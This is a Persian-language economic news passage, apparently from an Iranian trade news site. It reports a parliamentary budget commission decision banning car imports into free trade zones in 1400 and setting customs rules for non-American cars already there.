وی ادامه داد: مردم ایران هم اکنون هیچ شرایطی برای پذیرش تورم بالاتر یا فشار معیشتی و اقتصادی ندارند. ۷ میلیون نفر در کشور از جمعیت شاغلان در هیچ سیستم بیمه‌ای قرار ندارند. یعنی نه حقوقبگیر دولت و عضو صندوق بازنشستگی دولتی‌اند و نه مثل ۱۴ میلیون نفر شاغل دیگر بیمه تامین اجتماعی دارند.

۲۰ : ممنوعیت واردات خودرو به مناطق آزاد در سال آینده

سخنگوی کمیسیون تلفیق لایحه بودجه ۱۴۰۰ از مصوبه این کمیسیون در مورد ممنوعیت واردات هرگونه خودرو در سال ۱۴۰۰ به مناطق آزاد تجاری و صنعتی خبر داد.

رحیم زارع، اظهار کرد: به موجب مصوبه کمیسیون تلفیق دولت مکلف است به منظور تنظیم بازار خودروهای وارداتی ضمن شناسایی خودروهای خارجی غیرآمریکایی موجود در مناطق آزاد با اخذ حقوق گمرکی و سود بازرگانی که متناسب با معیارهای زیر ظرف مدت یک ماه از تاریخ ابلاغ این قانون توسط کمیته موضوع ماده یک قانون مقررات صادرات و واردات تعیین و توسط دولت ابلاغ می‌شود نسبت به ثبت سفارش و اجازه واردات خودروهای غیرآمریکایی موجود در مناطق آزاد تجاری و صنعتی اقدام کند.

به گفته وی براساس این مصوبه نرخ سود بازرگانی در تناسب با نوع خودرو و سال ساخت باید به گونه‌ای تنظیم شود که در مقایسه قیمت‌های کف بازار، منجر به سود غیرمتعارف (بیش از ۲۰ درصد) برای وارد کنندگان نشده و در صورت مشاهده روند فزاینده تفاوت میان قیمت‌های کف بازار و وارداتی دولت می‌تواند نسبت به تجدیدنظر در نرخ سود بازرگانی اقدام کند.

این نماینده مجلس شورای اسلامی خاطر نشان کرد: به موجب این مصوبه واردات خودروهای موضوع این تبصره برای سازمان‌های مناطق آزاد تجاری و صنعتی و شرکت‌های تابعه آنها، دستگاه‌های موضوع ماده پنج قانون مدیریت خدمات کشوری و نهادهای عمومی غیردولتی و شرکت‌های تابعه آنها ممنوع است همچنین واردات هرگونه خودرو در سال ۱۴۰۰ به مناطق آزاد تجاری و صنعتی ممنوع است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران